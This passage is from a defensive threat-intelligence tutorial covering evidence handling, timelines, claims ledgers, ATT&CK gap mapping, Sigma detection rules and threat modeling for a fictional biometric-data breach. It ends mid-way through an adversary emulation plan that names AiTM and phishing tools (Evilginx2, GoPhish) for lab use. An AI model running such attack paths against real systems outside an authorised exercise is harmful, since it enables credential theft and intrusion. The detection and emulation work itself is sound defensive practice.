start│ ├── reactive/│ ├── proactive/│ ├── full-cycle/│ └── adversary-emulation.md└── training/ ← 8 fully populated case folders with worked solutions ├── A01-reactive-lifetech/ ├── A02-proactive-celltronx/ └── ...Start the lab (optional but recommended)cp .env.example .env# Open .env and set all passwords before the next commandnano .env# Elasticsearch requires this kernel parametersudo sysctl -w vm.max_map_count=262144docker compose up -d./scripts/setup.sh # runs once; configures MITRE ATT&CK connector, indexes, initial users./scripts/health-check.sh # all services should return HTTP 200Once running:You do not need the lab to run the methodology. The minimum-viable path at the end of this article covers what to use instead.Step 1: Initial Information Gathering — Ask Before You LookThis is the step most analysts skip. It is the most important step.Before you open a log file, before you run a query, before you create a case — you need to understand what the reporter knows, what has already been touched, and what constraints exist. Getting this wrong means analyzing the wrong systems, missing the actual entry point, or tainting evidence that could later matter to regulators or legal.This step applies to all modes:Reactive: gather from the person who reported or discovered the incidentProactive: gather from the person who assigned the assessment (CISO, management, compliance)Full Cycle: gather from the sponsor of the program buildEmulation: gather from the authorization chainRun this as a structured conversation — a call, a meeting, or a written intake form filled in by the requester. Take verbatim notes. Do not interpret or analyze during this step; just capture.→ Reactive Investigation — Intake — full intake form, why each section matters, and how to commit the intake into the project git history.Step 2: Create Your Project Folder from the TemplateAfter intake, create the project folder and commit the intake document into it:# Choose the template matching your modecp -r CTI_as_a_Code/templates/reactive/ investigations/myorg-incident-2025-03/cd investigations/myorg-incident-2025-03/git initgit add .git commit -m "PROJ-001: scaffold initialized"# Copy your intake notes into the projectcp /path/to/intake-notes.md 00-scope/intake.mdgit add 00-scope/intake.mdgit commit -m "PROJ-001: intake complete - initial hypothesis: AiTM contractor credential theft"The intake document becomes the first record in the investigation’s git history. Every subsequent commit builds on it. When the investigation is reviewed three months later, the git log shows what was known when, and what the analyst’s reasoning was at each stage.Step 3: Scope the ProjectFile: 00-scope/scope.md | Role: Team Lead | Time: 30 minThe scope document translates the intake into a formal project definition. It is signed off by the stakeholder before analysis begins. Scope changes during the investigation require a new commit with explicit justification — this prevents scope creep and keeps the git history honest.# Scope — PROJ-001 — MyOrg Incident 2025-03Signed off by: CISO (Rachel K.) | Date: 2025-03-18 09:00 IST## In scope- Systems: HOST-01, HOST-02, vpn-gw-01, db-01- Time range: 2025-03-15 00:00 IST - 2025-03-18 23:59 IST- Evidence: Winlogbeat JSONL, VPN gateway logs, DB audit log, netflow## Out of scope- Cloud infrastructure - separate authorization required; pending CISO approval- Employee endpoints outside the affected /24 subnet## PIRs (Priority Intelligence Requirements)These are the specific questions this investigation must answer. Analysis is completewhen all PIRs have an assessed answer or are explicitly closed as unanswerable.- PIR-001: Did the adversary access or exfiltrate biometric records from db-01?- PIR-002: What was the initial access vector - how did they get in?- PIR-003: Is there any indication of ongoing access or persistence as of 2025-03-18?## Stakeholders- Commissioned by: CISO- Deliverables to: CISO, IR Lead, Legal- Scope change authority: CISO only - any scope expansion requires written approval## Evidence handling- TLP: AMBER - share with CERT-IL only with explicit CISO approval- Legal hold on all artifacts pending INCD notification decision - do not delete anything- Do not access db-01 production environment directly - use log copies onlyCommit and get written sign-off (Slack, email, or a note in the case):git add 00-scope/git commit -m "PROJ-001: scope signed off by CISO — PIR-001 through PIR-003, TLP AMBER, legal hold"Reactive Mode: Full WalkthroughStep R1: Collect and Inventory EvidenceFile: 01-evidence/README.md | Time: 2–8 h depending on evidence volumeBefore any analysis, build the complete evidence inventory. The rule: you do not analyze what you have not inventoried. Working from untracked evidence is how findings get missed and how the chain of custody breaks.Collection with Velociraptor (remote, no reboot required):# Collect Windows Security event log from HOST-01velociraptor -v artifacts collect Windows.EventLogs.Evtx \ --args EventLog=Security \ --output HOST-01-security.jsonl# Collect Sysmon (process creation, network, file events)velociraptor -v artifacts collect Windows.EventLogs.Evtx \ --args EventLog="Microsoft-Windows-Sysmon/Operational" \ --output HOST-01-sysmon.jsonl# Collect PowerShell script block loggingvelociraptor -v artifacts collect Windows.EventLogs.Evtx \ --args EventLog="Microsoft-Windows-PowerShell/Operational" \ --output HOST-01-powershell.jsonlHash all collected evidence immediately:sha256sum HOST-01-security.jsonl HOST-01-sysmon.jsonl vpn-gw-2025-03-17.jsonl \ > evidence-checksums.sha256git add evidence-checksums.sha256git commit -m "PROJ-001: evidence checksums - chain of custody established"Build the inventory table:| Source | File | Systems | Time Range | Gap | SHA256 | Usability ||---|---|---|---|---|---|---|| Windows Security log | HOST-01-security.jsonl | HOST-01 | 2025-03-15 – 2025-03-18 | None | a3f1... | High || Sysmon | HOST-01-sysmon.jsonl | HOST-01 | 2025-03-15 – 2025-03-18 | GAP-001: 03:00–07:00 IST on 03-17 | b2e4... | High (with gap) || VPN gateway | vpn-gw-2025-03-17.jsonl | vpn-gw-01 | 2025-03-17 only | None | c9d7... | High || DB audit log | vrid-audit-2025-03-17.jsonl | db-01 | 2025-03-17 00:00–06:00 | Post-06:00 log rotation lost | d4a2... | Medium || Netflow | govnet-ops-2025-03-17.jsonl | All | 2025-03-17 | None | e8b3... | High |Document every gap explicitly:## GAP-001 — HOST-01 Sysmon | 2025-03-17 03:00–07:00 ISTMissing event types: process creation (EID 1), network connections (EID 3), file creation (EID 11)Duration: 4 hoursRoot cause: Sysmon service crash; restart at 07:02 confirmed in System logWhat does cover this window: Security log (EID 4624, 4688 partial) - some process activity visibleConfidence impact: T1059, T1055, T1136, T1543 activity during this window CANNOT be confirmed or ruled out. Any claim about adversary actions between 03:00–07:00 must be labeled HYPOTHESIZED unless supported by netflow or DB audit log.Normalize to super-timeline with Plaso:log2timeline.py --storage-file PROJ-001.plaso \ HOST-01-security.jsonl \ HOST-01-sysmon.jsonl \ vpn-gw-2025-03-17.jsonl \ vrid-audit-2025-03-17.jsonl \ govnet-ops-2025-03-17.jsonlpsort.py -o l2tcsv PROJ-001.plaso \ --slice "2025-03-17T00:00:00" \ --slice_size 1440 \ > supertimeline-2025-03-17.csvRapid Sigma triage with Hayabusa before Timesketch setup:hayabusa csv-timeline \ --directory ./evtx/ \ --output hayabusa-triage.csv \ --profile verbose \ --min-level medium# Sort by severity to find high-confidence hits firstsort -t',' -k5 -r hayabusa-triage.csv | head -50git add 01-evidence/git commit -m "PROJ-001: evidence inventory - 5 sources, GAP-001 documented (4h Sysmon outage on 03-17)"Step R2: Build the Timeline with Evidence LabelsFile: 03-analysis/timeline/timeline.md | Time: 4–20 hThe timeline is a chronological log of every relevant event with three things that most timelines omit: evidence citations, evidence labels, and ATT&CK technique mappings.Evidence label system — every event gets one:Why labels matter: Without them, analysts conflate what they saw with what they inferred. The label forces explicit acknowledgment of how strong each piece of evidence is. When an executive asks “are you sure they took the data?”, the answer is “CONFIRMED — two independent sources (DB audit log and netflow) both show 892 MB outbound” not “we think so.”Example timeline entries:## 2025-03-17 02:09:41 IST | CORROBORATED | T1566.001Email gateway: message delivered to contractor-07@myorg.il from spoofed.vendor@mailpro[.]ccAttachment: Q1-Invoice-2025.docx (SHA256: 4a7f...)Single source — email gateway log only; no AV alert (attachment not flagged at delivery)Note: This is the suspected initial delivery. No click/open event confirmed yet.## 2025-03-17 02:14:23 IST | CONFIRMED | T1078.001VPN gateway: authentication from 185.234.x.x, UserID: contractor-07Source 1: vpn-gw-2025-03-17.jsonl line 4,471 - SessionID: VPN-20250317-8821Source 2: RADIUS auth log - same SessionID, same source IP, same timestamp ±2sNo prior VPN session history for contractor-07 from this IP. HR confirmed contractor-07was not working on 2025-03-17. Two independent sources → CONFIRMED.PIR-002 status: partial answer - likely credential theft prior to this event## 2025-03-17 02:17–02:44 IST | INFERRED | T1021.001Adversary likely moved laterally from contractor jump host to db-01 during this window.Inference basis: VPN session established at 02:14 (CONFIRMED); DB access at 02:47 (CONFIRMED);no direct evidence of the lateral movement path - jump host Sysmon logs not available.This step is inferred from the 30-minute gap between VPN auth and DB access.Cannot confirm the specific technique (RDP, SMB, other) without jump host logs.## 2025-03-17 02:47:11 IST | CONFIRMED | T1048.003DB audit log: SELECT * on biometric_records from 185.234.x.xSource 1: vrid-audit-2025-03-17.jsonl line 892 - full-table SELECT, 340,218 rowsSource 2: netflow - 892.4 MB outbound from db-01 to 185.234.x.x at 02:47:11–02:51:33PIR-001 status: ANSWERED YES - biometric records accessed and exfiltrated## 2025-03-17 03:00–07:00 IST | GAP (GAP-001)Sysmon coverage lost. Security log partial. Cannot confirm or rule out:- T1059.001/003 (command execution)- T1136 (account creation / persistence)- T1105 (tool staging)See GAP-001 in evidence inventory for impact assessment.Step R3: Claims LedgerFile: 03-analysis/claims/claims-ledger.md | Time: 1–2 hThe claims ledger is the single most important document in the investigation. It is what transforms a timeline narrative into structured, auditable analysis.Every row answers five questions:What is the specific assertion? (One sentence, falsifiable)What evidence supports it? (File path and line number)How confident are we? (High / Medium / Low with rationale)What alternative explanations were considered? (And why were they ruled out or left open)Which PIR does this answer?| ID | Claim | Evidence | Confidence | Competing Hypotheses | PIR ||---|---|---|---|---|---|| CL-001 | Adversary authenticated to the VPN using valid credentials for contractor-07 at 02:14 IST on 2025-03-17 | vpn-gw.jsonl:4471 + RADIUS log (same SessionID) | High | Legitimate login — ruled out: no prior session from this IP; contractor confirmed offline by HR; IP geolocates to Iranian hosting provider | PIR-002 || CL-002 | The biometric_records database was fully exfiltrated (340,218 rows, 892.4 MB) at 02:47–02:51 IST | db-audit.jsonl:892 (SELECT *) + netflow (892.4 MB from db-01 to 185.234.x.x) | High | Scheduled backup — ruled out: backup confirmed at 04:00; no authorized job at 02:47; db-admin confirmed no maintenance scheduled | PIR-001 || CL-003 | Initial credential theft was via AiTM phishing, not brute force or purchase | Session token replay pattern in VPN auth (no prior failed auths, immediate successful auth from new IP); email delivery confirmed 5 min before VPN auth | Medium | Credential purchase / insider — cannot fully rule out without forensic analysis of contractor-07 endpoint | PIR-002 || CL-004 | Persistence mechanism is unknown; cannot be determined | No log coverage during GAP-001 (03:00–07:00); no scheduled task, registry, or service evidence outside this window | Insufficient | Unknown — GAP-001 prevents assessment | PIR-003 || CL-005 | No confirmed evidence of access after 2025-03-17 07:02 IST (Sysmon restart) | All log sources show no activity from 185.234.x.x after 03:21 | Medium | Adversary using different infrastructure after initial exfil — cannot rule out; recommend threat hunt | PIR-003 |The claims ledger drives everything downstream:Executive brief cites CL-IDs, not raw log linesSOC handoff uses claims to justify IOC confidenceAttribution assessment cites claims as the evidence basisSigma rules reference which claim they would have detectedgit add 03-analysis/claims/ 03-analysis/timeline/git commit -m "PROJ-001: analysis — 16-event timeline, 5 claims; PIR-001 YES (CL-002), PIR-002 MEDIUM (CL-001/CL-003)"Step R4: ATT&CK Mapping with Gap ClassificationFile: 03-analysis/attck-mapping/attck-mapping.md | Time: 1–2 hThe ATT&CK mapping has two purposes: documenting what happened (intelligence) and measuring detection coverage (operations). The Gap Type column is the operational output — it tells the SOC and engineering teams exactly what kind of work is needed for each missed technique.| # | Tactic | Technique | Sub | Evidence | Confidence | Rule Fired? | Gap Type | Remediation ||---|---|---|---|---|---|---|---|---|| 1 | Initial Access | T1566.001 | — | Email gateway log | High | Partial | Coverage incomplete | Fix email gateway rule to extract attachment hash || 2 | Credential Access | T1557 | — | VPN timing pattern (CL-003) | Medium | No | Rule missing | Write Sigma rule DET-002; VPN logs are in SIEM || 3 | Initial Access | T1078.001 | — | VPN auth (CL-001) | High | No | Rule missing | Write Sigma rule DET-003 for anomalous VPN auth || 4 | Lateral Movement | T1021.001 | — | Inferred (CL-002 timing) | Low | Unknown | Data source missing | Jump host logs not ingested — engineering ticket || 5 | Collection/Exfil | T1048.003 | — | DB audit + netflow (CL-002) | High | No | Data source missing | DB audit log not in SIEM — Logstash pipeline needed || 6 | Impact (unknown) | Unknown | — | GAP-001 | — | Unknown | Architectural gap | Sysmon reliability improvement — separate track |Gap taxonomy (each type requires different remediation):Export the Navigator layer and commit it:# In ATT&CK Navigator: build your coverage layer (green=detected, yellow=partial, red=missed)# Export as JSON: Layer → Download as JSON# Save to: 03-analysis/attck-mapping/navigator-layer.jsongit add 03-analysis/attck-mapping/git commit -m "PROJ-001: ATT&CK mapping - 6 techniques; 2 rule-missing, 2 data-source-missing, 1 incomplete, 1 arch-gap"Decider — guided ATT&CK mapping when the technique is unclear:When you observe a behavior but are not certain which ATT&CK technique or sub-technique it maps to, Decider (CISA) walks you to the correct answer through a structured question tree. Instead of searching the ATT&CK site manually, Decider asks what the adversary was trying to accomplish, then narrows to the correct tactic, technique, and sub-technique.# Run Decider locally with Docker (one-time setup)git clone https://github.com/cisagov/Decider.gitcd Decidercp .env.docker .env# Edit .env — set DB_ADMIN_PASS, DB_KIOSK_PASS, CART_ENC_KEY, APP_ADMIN_PASScp -r default_config/. config/sudo docker compose up# Visit http://localhost:8001Workflow within Step R4:Question Tree — navigate Matrix → Tactic → Technique → Sub-technique by answering what the adversary did. Useful when the behavior is ambiguous (e.g., distinguishing T1059.001 from T1059.003 from an encoded command line, or deciding between T1078.001 and T1078.002 for a credential re-use event).Full Technique Search — boolean search with prefix-matching and stemming across all ATT&CK descriptions. Faster than the ATT&CK site when you have a partial technique name or keyword from a log line.Cart → Export — add confirmed techniques to the cart as you work through the mapping table. Export as a Navigator layer JSON (heatmap) or a formatted table for the attck-mapping.md file.Decider does not replace the ATT&CK Navigator — it answers the “which technique is this?” question before you get to the Navigator layer. Use Decider to map, Navigator to visualize coverage.Export the Navigator layer and commit it:# In ATT&CK Navigator: build your coverage layer (green=detected, yellow=partial, red=missed)# Export as JSON: Layer → Download as JSON# Save to: 03-analysis/attck-mapping/navigator-layer.jsongit add 03-analysis/attck-mapping/git commit -m "PROJ-001: ATT&CK mapping - 6 techniques; 2 rule-missing, 2 data-source-missing, 1 incomplete, 1 arch-gap"Step R5: Attribution AssessmentFile: 03-analysis/attribution/attribution.md | Time: 1–2 hWrite the attribution section only after the claims ledger is complete. Attribution that precedes the evidence analysis is a hypothesis, not a conclusion. The sequence matters.The confidence ladder — use the correct language for the evidence you have:Infrastructure pivoting for attribution — run from the C2 IP before enrichment ages:# Passive DNS and co-hostingcurl "https://api.shodan.io/shodan/host/185.234.x.x?key=YOUR_KEY" | jq '.hostnames, .ports, .data[].banner'# VirusTotal for prior detection history and passive DNS# Certificate transparency - find co-hosted domains by SAN entries# MISP cross-correlation - does this IP appear in prior community events?## Attribution Assessment - PROJ-001### Evidence available- AiTM credential interception via reverse proxy: consistent with CERT-IL CB-2025-041 actor profile- C2 IP 185.234.x.x: passive DNS shows co-hosting with domains flagged in CERT-IL events CB-2025-039 and CB-2025-031 (confirmed via MISP cross-correlation)- Tooling: cannot assess - no malware recovered due to GAP-001- TTP overlap: T1557 + T1078.001 + T1048.003 consistent with cluster profile from CB-2025-041### Confidence: MediumTwo data points (TTP overlap + infrastructure overlap with prior CERT-IL events) providecorroborating evidence. Independent confirmation would require: (a) toolset match fromcontractor-07 endpoint forensics, or (b) CERT-IL deconfliction confirming this IP in anactive track. Neither is currently available.### Language for deliverables"Activity assessed as consistent with the Iranian-nexus contractor-targeting clusterdocumented in CERT-IL CB-2025-041 (medium confidence), based on AiTM tradecraft overlapand C2 infrastructure observed in two prior CERT-IL-flagged events. Toolset confirmationis not possible due to evidence gap GAP-001."Step R6: Derive Sigma Rules for Every Missed TechniqueFiles: 04-detections/sigma/DET-NNN-name.yml | Time: 30–60 min per ruleFor each “Rule missing” or “Coverage incomplete” entry in the ATT&CK mapping, write a Sigma rule. The Sigma file references the investigation, the technique, and the validation result — creating a permanent link between intelligence and detection:title: Anomalous VPN Authentication — New Source IP for Known Userid: 7a3c9b1d-5678-4321-efab-9876543210cdstatus: experimentaldescription: > Detects a VPN authentication from a source IP with no prior history for the authenticating user. Consistent with AiTM credential replay (T1078.001 + T1557). Derived from PROJ-001 — initial access step, CL-001 (high confidence).author: CTI Team — PROJ-001date: 2025-03-19logsource: category: network product: palo_alto_vpn # adjust to your VPN productdetection: selection: event.action: vpn_auth_success user.name|exists: true filter_known: source.ip|cidr: - '10.0.0.0/8' # corporate NAT ranges - '172.16.0.0/12' condition: selection and not filter_knownfalsepositives: - VPN access from legitimate travel (new country/IP) — validate against HR travel records - New contractor onboarding from home IP — coordinate with ITlevel: mediumtags: - attack.initial_access - attack.credential_access - attack.t1078.001 - attack.t1557# PROJ-001: DET-003 | Gap: ATT&CK row 3 (Rule missing)# Validated: PASS | 2025-03-19 | hayabusa against PROJ-001 evtx setValidation before deployment:# Step 1: Confirm the rule fires on the known true-positive event in the incident evtx sethayabusa csv-timeline \ --directory ./evtx/ \ --rules ./04-detections/sigma/DET-003-vpn-new-source-ip.yml \ --output validate-DET-003.csv# Check the output includes the 02:14 event from contractor-07grep "contractor-07" validate-DET-003.csv# Step 2: Convert to Elastic Lucene for deploymentpip install pySigma-backend-elasticsearch sigma-clisigma convert -t lucene -p ecs_windows \ 04-detections/sigma/DET-003-vpn-new-source-ip.yml# Step 3: Convert to ES|QL (alternative format for newer Elastic stacks)sigma convert -t esql -p ecs_windows \ 04-detections/sigma/DET-003-vpn-new-source-ip.ymlgit add 04-detections/git commit -m "PROJ-001: detections — DET-001 through DET-004 written and validated PASS via Hayabusa"Step R7: Produce DeliverablesFiles: 05-deliverables/ | Time: 2–4 hExecutive brief — maximum 1 page, no technical artifacts:# Incident Brief — PROJ-001 [TLP: AMBER]2025-03-19 | For: CISO, IR Lead, Legal## What happenedAn assessed Iranian-nexus actor accessed the NDSA biometric records database on 2025-03-17using stolen VPN credentials belonging to contractor-07, exfiltrating approximately 340,218biometric records. Initial entry occurred at 02:14 IST; exfiltration completed by 02:51 IST.## Business impactINCD notification is required within 72 hours of discovery (deadline: 2025-03-20 02:14 IST).Biometric Database Authority notification required under Section 12 of the Biometric Database Law.No confirmed evidence of ongoing access as of investigation date.## Key findings- The adversary used valid contractor credentials obtained through suspected phishing - no brute force or technical exploit was required to enter the network- The full biometric records table (340,218 records) was extracted in a single session lasting 4 minutes- Three of five adversary techniques had no detection coverage at the time of the incident; none of the five triggered an alert## What was not detectedThe credential theft, the VPN login from an unrecognized IP, and the database exfiltrationall occurred without generating a single security alert. The incident was discovered througha retrospective log review 36 hours after it concluded, not through real-time detection.## Recommended actions1. [IR Lead - by 18:00 today] Revoke and rotate all contractor VPN credentials2. [CISO - by 02:14 IST 2025-03-20] File INCD notification using the PROJ-001 incident report3. [SOC Lead - by end of week] Deploy detection rules DET-001 through DET-004 to Kibana; submit DB audit log pipeline to engineering as P0 ticketSOC handoff contains the operational package — not narrative, only actionable data:# SOC Handoff — PROJ-001## Current IOCs (valid as of 2025-03-19)| Type | Value | Confidence | TTL | Action ||---|---|---|---|---|| IPv4 | 185.234.x.x | High | 30 days | Block at perimeter; alert on any new connections || Domain | spoofed.vendor@mailpro[.]cc | High | 30 days | Block at email gateway || SHA256 | 4a7f... (Q1-Invoice-2025.docx) | Medium | 90 days | Block at endpoint |## Rules deployed / pending| Rule ID | Status | CAB ticket | Covers ||---|---|---|---|| DET-001 | Deployed 2025-03-19 14:00 | CAB-2025-0341 | T1566.001 email delivery || DET-003 | Deployed 2025-03-19 14:00 | CAB-2025-0341 | T1078.001 anomalous VPN auth || DET-002 | Pending - blocked on VPN log pipeline | ENG-0234 | T1557 AiTM session replay || DET-004 | Pending - blocked on DB audit pipeline | ENG-0235 | T1048.003 DB exfiltration |## Hunting queries (residual activity)Hunt for additional sessions from the same ASN as 185.234.x.x in the 30 days before the incident.Hunt for any contractor accounts that authenticated successfully from IPs with no prior history.## Escalation criteriaEscalate immediately if:- Any new connection from 185.234.x.x or the /24 subnet- Any authentication from contractor-07 or other contractor accounts outside working hours- Any new SELECT * queries against the biometric_records tableProactive Mode: Full WalkthroughStep P1: Copy the Templatecp -r CTI_as_a_Code/templates/proactive/ assessments/myorg-threat-model-2025-q2/cd assessments/myorg-threat-model-2025-q2/git init && git add . && git commit -m "PROJ-002: proactive scaffold initialized"Proactive template structure:proactive/├── 00-scope/scope.md├── 01-trigger-intelligence/│ ├── trigger-assessment.md ← summary across all triggers│ └── triggers/│ ├── TRG-001-cert-il-advisory.md│ └── TRG-NNN-name.md ← one file per trigger├── 02-crown-jewels/│ └── crown-jewels.md├── 03-threat-model/│ ├── attack-paths.md ← paths from entry to crown jewels│ └── scenarios/│ └── SCN-NNN-name.md ← one per attack path├── 04-detection-backlog/│ └── detection-backlog.md└── 07-deliverables/ ├── executive-brief.md └── technical-brief.mdStep P2: Run the IntakeBefore you open any advisory or run any query, capture the commissioner’s requirements in a structured intake call.→ Proactive Assessment — Intake — full intake form (trigger, crown jewels, detection posture, mandate, threat context, regulatory context), why each section matters, and how to commit the intake into the project git history.Step P3: Assess Trigger IntelligenceFiles: 01-trigger-intelligence/triggers/TRG-NNN-name.md | Time: 2–4 h per trigger cycleA trigger is an intelligence input that changes the threat assessment for this specific organization. Write one file per trigger:# TRG-001 — CERT-IL CB-2025-041: AiTM Campaign Targeting Government Contractors## What happenedCERT-IL advisory CB-2025-041 (2025-04-03) describes an active AiTM phishing campaign targetingcontractors with access to Israeli government identity and biometric systems. Three confirmedvictims in the municipal sector in March 2025. The adversary cluster replays intercepted sessiontokens within 4–8 hours of interception.## Source reliabilitySource: CERT-IL - rating A (completely reliable; official government advisory from direct investigation)Information: 1 (confirmed - CERT-IL investigated the victim cases directly)Combined: High## Relevance to THIS organization- MyOrg operates contractor VPN with the same architecture described in CB-2025-041- Contractor class accounts have direct read access to the biometric records database- Two MyOrg contractors use the same IdP flagged in the advisory- MyOrg's MFA is not enforced on VPN re-authentication for valid sessions - identical gap## ATT&CK techniques implied- T1557 - AiTM session token interception- T1078.001 - VPN authentication with stolen credentials- T1048 - data exfiltration via authorized session (no alert triggered in victim cases)## Detection action impliedPRIORITY: Verify whether VPN authentication logs are ingested into the SIEM.If not - this is a P0 pipeline gap that blocks detection of the primary technique.If yes - write AiTM detection rule immediately.## ConfidenceHigh - authoritative source, directly applicable to our architecture, confirmed active campaign.Step P4: Crown Jewels AnalysisFile: 02-crown-jewels/crown-jewels.md | Time: 2–4 hTier every asset by the business impact of compromise. Be specific — vague tier assignments produce vague threat models:## Tier 1 — Critical (compromise triggers regulatory notification or irreversible harm)| Asset | System | Why Tier 1 | Notification trigger ||---|---|---|---|| Biometric records database | db-01 | 340K+ biometric records; Biometric Database Law §12 | Biometric Database Authority + INCD || Payment gateway | pay-gw-01 | PCI-DSS scope; real-time payment processing | BoI-CD 362 immediate notification || Active Directory | dc-01 | Domain takeover enables access to all Tier 1 systems | All downstream triggers || GovID authentication service | govid-svc-01 | National identity system; 2.1M citizen accounts | INCD mandatory notification |## Tier 2 - High (enables attack on Tier 1)| Asset | System | Attack path to Tier 1 ||---|---|---|| Contractor VPN gateway | vpn-gw-01 | Entry point; contractor accounts have db-01 read access || Contractor jump host | jump-01 | Pivot from DMZ to internal db-01 segment || Identity provider | idp-01 | Credential validation for all internal services || SIEM / logging infrastructure | siem-01 | Attacker visibility if compromised; evidence destruction risk |## Tier 3 - Medium (operational impact, no regulatory trigger)- Internal wikis and collaboration tools- Development and staging environments (non-production data only)- Monitoring dashboards| Asset | System | Why Tier 1 | Notification trigger ||---|---|---|---|| Biometric records database | db-01 | 340K+ biometric records; Biometric Database Law §12 | Biometric Database Authority + INCD || Payment gateway | pay-gw-01 | PCI-DSS scope; real-time payment processing | BoI-CD 362 immediate notification || Active Directory | dc-01 | Domain takeover enables access to all Tier 1 systems | All downstream triggers || GovID authentication service | govid-svc-01 | National identity system; 2.1M citizen accounts | INCD mandatory notification |## Tier 2 - High (enables attack on Tier 1)| Asset | System | Attack path to Tier 1 ||---|---|---|| Contractor VPN gateway | vpn-gw-01 | Entry point; contractor accounts have db-01 read access || Contractor jump host | jump-01 | Pivot from DMZ to internal db-01 segment || Identity provider | idp-01 | Credential validation for all internal services || SIEM / logging infrastructure | siem-01 | Attacker visibility if compromised; evidence destruction risk |## Tier 3 - Medium (operational impact, no regulatory trigger)- Internal wikis and collaboration tools- Development and staging environments (non-production data only)- Monitoring dashboardsStep P5: Model Attack ScenariosFiles: 03-threat-model/scenarios/SCN-NNN-name.md | Time: 1–2 h per scenarioFor each path from perimeter (or insider) to a Tier 1 asset, write a scenario. The scenario is not a story — it is a structured model that maps directly to detection tasks:# SCN-001 — Contractor AiTM Phishing → Biometric Database Exfiltration## Trigger basisTRG-001 (CERT-IL CB-2025-041) - confirmed active campaign using this exact path## Kill chain| Step | Technique | Procedure | Current coverage ||---|---|---|---|| 1 | T1566.001 | Spearphishing link to spoofed VPN login page | Partial rule - browser-based phishing not covered || 2 | T1557 | AiTM proxy intercepts session token | No rule - VPN auth logs NOT in SIEM || 3 | T1078.001 | Token replay to VPN gateway | No rule - same pipeline gap || 4 | T1021.001 | RDP from jump host to db-01 | No rule - jump host Sysmon not collected || 5 | T1048.003 | Full-table SELECT; HTTPS exfil to C2 | No rule - DB audit log not in SIEM |## Coverage verdict0 of 5 techniques covered. All 5 require detection backlog entries.3 of 5 are blocked by pipeline gaps (steps 2–4) - these require engineering work before rules can be written.## Impact if scenario executes undetected- 340K+ biometric records exfiltrated- INCD and Biometric Database Authority notifications mandatory- Estimated regulatory exposure: significantStep P6: Build the Detection BacklogFile: 04-detection-backlog/detection-backlog.md | Time: 1–2 hThe detection backlog translates scenario analysis into sprint-ready engineering work. Every item has enough information to be picked up by a detection engineer without further context:| Pri | ID | Technique | Scenario | Pre-condition | Owner | Sprint | Status ||---|---|---|---|---|---|---|---|| P0 | ENG-001 | Pipeline | SCN-001 steps 2–3 | VPN auth logs must be ingested into SIEM before DET-B001/B002 can be written | Engineering | Sprint 1 | Blocked — pipeline || P0 | ENG-002 | Pipeline | SCN-001 step 5 | DB audit log must be ingested before DET-B003 | Engineering | Sprint 1 | Blocked — pipeline || P1 | DET-B001 | T1557 (AiTM) | SCN-001 step 2 | Requires ENG-001 | Detection | Sprint 2 | Waiting on ENG-001 || P1 | DET-B002 | T1078.001 | SCN-001 step 3 | Requires ENG-001 | Detection | Sprint 2 | Waiting on ENG-001 || P1 | DET-B003 | T1048.003 | SCN-001 step 5 | Requires ENG-002 | Detection | Sprint 2 | Waiting on ENG-002 || P2 | DET-B004 | T1021.001 | SCN-001 step 4 | Jump host Sysmon deployment needed | Detection | Sprint 3 | — || P2 | DET-B005 | T1566.001 | SCN-001 step 1 | Partial rule exists — needs browser phishing coverage added | Detection | Sprint 2 | Tuning existing rule |P0 items are not detection rules — they are infrastructure prerequisites. The backlog separates these explicitly so the sprint plan is realistic: you cannot write an AiTM detection rule if the VPN logs are not in the SIEM. Making this visible prevents teams from reporting “rule written” while the actual gap remains open.git add .git commit -m "PROJ-002: proactive complete — SCN-001 modeled, detection backlog 7 items (2 blocked on pipeline)"Full Cycle Mode: Building a CTI ProgramFull Cycle applies when the task is not a single investigation but building the capability to run investigations continuously. It produces a governance structure, a PIR framework, and a collection plan.cp -r CTI_as_a_Code/templates/full-cycle/ programs/myorg-cti-program-2025/cd programs/myorg-cti-program-2025/git init && git add . && git commit -m "PROJ-003: full-cycle scaffold initialized"Before any program design work begins, run the intake to capture the sponsor’s mandate, stakeholder map, initial PIRs, and maturity target.→ Full-Cycle Program — Intake — full intake form (program mandate, stakeholders, PIR register, collection requirements, sharing architecture, governance), why each section matters, and how to commit the intake as the program’s first artifact.Key outputs of full-cycle mode:Stakeholder map — who receives what intelligence, at what classification level, on what schedule:| Stakeholder | Role | Products | TLP | Cadence ||---|---|---|---|---|| CISO | Executive sponsor | Strategic brief, program metrics | AMBER | Monthly || SOC Lead | Operational consumer | Tactical alert, IOC packages | RED | On-demand || Detection Engineering | Technical consumer | Sigma backlog, hunting hypotheses | RED | Weekly sprint || Legal / Compliance | Regulatory | Incident reports, regulatory notifications | AMBER | Per incident || CERT-IL | External sharing | Anonymized IOC packages | GREEN | Per incident |PIR register — every PIR linked to a stakeholder decision:| ID | PIR | Stakeholder | Decision it drives | Review cadence ||---|---|---|---|---|| PIR-001 | Is the Iranian-nexus AiTM cluster from CERT-IL CB-2025-041 actively targeting our contractor VPN? | CISO | Contractor access architecture review | Monthly || PIR-002 | What is the current detection coverage rate across our top-10 adversary techniques? | SOC Lead | Sprint prioritization and backlog ordering | Bi-weekly || PIR-003 | Are any of our third-party suppliers under active targeting by nation-state actors? | Legal / Procurement | Supplier risk assessment and contract reviews | Quarterly |Collection plan — sources mapped to PIRs, with gaps made explicit:| Source | PIRs | Reliability | Current status | Gap ||---|---|---|---|---|| CERT-IL advisories | PIR-001, PIR-003 | A/1 (High) | Active MOU — weekly digest | None || Internal SIEM alerts | PIR-002 | A/1 (High) | Active | VPN logs not ingested — ENG-001 || Recorded Future | PIR-001, PIR-002 | B/2 (Medium-High) | No subscription | Procurement Q3 2025 || Sector ISAC | PIR-003 | B/2 (Medium-High) | Membership lapsed | Renewal in progress |Collection gaps that block PIR answers are tracked as program risks with owners and deadlines — not just technical notes. A PIR that cannot be answered because a log source is not ingested is a program failure, not a SIEM problem.Adversary Emulation Mode: Validating CoverageEmulation runs after detections have been built. It answers the question: do these rules actually work against a real adversary executing these techniques?cp CTI_as_a_Code/templates/adversary-emulation.md \ exercises/myorg-emulation-q3-2025.mdBuild the emulation plan from a CTI report:# Emulation Plan — Operation Desert Cipher (Q3 2025)## AuthorizationAuthorized by: CISO - ref: AUTH-2025-Q3-001Scope: JUMPHOST-LAB and TARGET-LAB only; no production systemsDate: 2025-07-14 through 2025-07-16## Threat intelligence basisCTI report: training/A04-emulation-techpay/01-cti-report/operation-desert-cipher.mdActor: Assessed Iranian-nexus cluster## Module table| # | Technique | Procedure | Tool | Expected alert | Pre-check ||---|---|---|---|---|---|| MOD-01 | T1566.001 | Send .docx with embedded macro | GoPhish | Email gateway + EDR | Email gateway logs ingested? || MOD-02 | T1557 | AiTM proxy against lab VPN portal | Evilginx2 | VPN auth anomaly rule | VPN logs in 